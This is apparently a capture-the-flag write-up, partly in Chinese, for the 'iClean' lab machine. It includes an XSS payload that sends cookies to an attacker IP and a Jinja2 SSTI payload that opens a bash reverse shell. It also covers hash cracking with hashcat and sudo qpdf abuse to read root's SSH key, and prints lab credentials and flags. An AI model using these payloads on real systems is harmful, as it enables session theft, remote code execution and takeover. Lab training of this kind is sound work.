Main
$ nmap -p- -sC -sV 10.10.11.12 -Pn --min-rate 1000

$ echo "10.10.11.12 capiclean.htb">>/etc/hosts

这题可能和python的SSTI有关

$ gobuster dir --url "http://capiclean.htb" --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

http://capiclean.htb/quote
存在一处服务订购提交页面,不是一个查询服务所以sql注入的可能性就小很多


<img src='http://10.10.16.23/' onerror='fetch("http://10.10.16.23?c="+document.cookie)' />


这里如果没有cookie就新建一个
把path改成/

访问dashboard

在InvoiceGenerator用于生成订单

将生成的订单id来到QRGenerator生成二维码扫描

这是一份账单

在qr_link参数中,{{4*4}}在响应包中返回16证明存在SSTI

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("bash -c 'bash -i >& /dev/tcp/10.10.16.23/10032 0>&1'")|attr("read")()}}

在app.py中发现泄露了数据库配置信息

db_config = { 'host': '127.0.0.1', 'user': 'iclean', 'password': 'pxCsmnGLckUb', 'database': 'capiclean' }
$ mysql -u iclean -p

mysql> use capiclean;
mysql> select * from users;

将consuela的哈希进行破解
$ echo "0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa">hash
$ hashcat -m 1400 -a 0 hash /usr/share/wordlists/rockyou.txt

simple and clean
User Flag
$ su consuela
$ cat /home/consuela/user.txt

e4fb54144493b2df71de87281902e002
Root Flag
$ sudo -l

- /usr/bin/qpdf 是一个用于处理PDF文件的命令行工具。它可以执行各种PDF文件操作,包括合并、拆分、解密、加密、旋转页面等。QPDF提供了丰富的功能和选项,可以让用户在命令行下方便地进行PDF文件的处理。
$ sudo /usr/bin/qpdf --empty /tmp/key.pdf --qdf --add-attachment /root/.ssh/id_rsa --
$ cat /tmp/key.pdf

通过私钥登录Root用户
$ chmod 400 id_rsa ;ssh -i id_rsa root@10.10.11.12
root@iclean:~# cat /root/root.txt

e9f42fab26856026679cbcd1bb76b7ed



















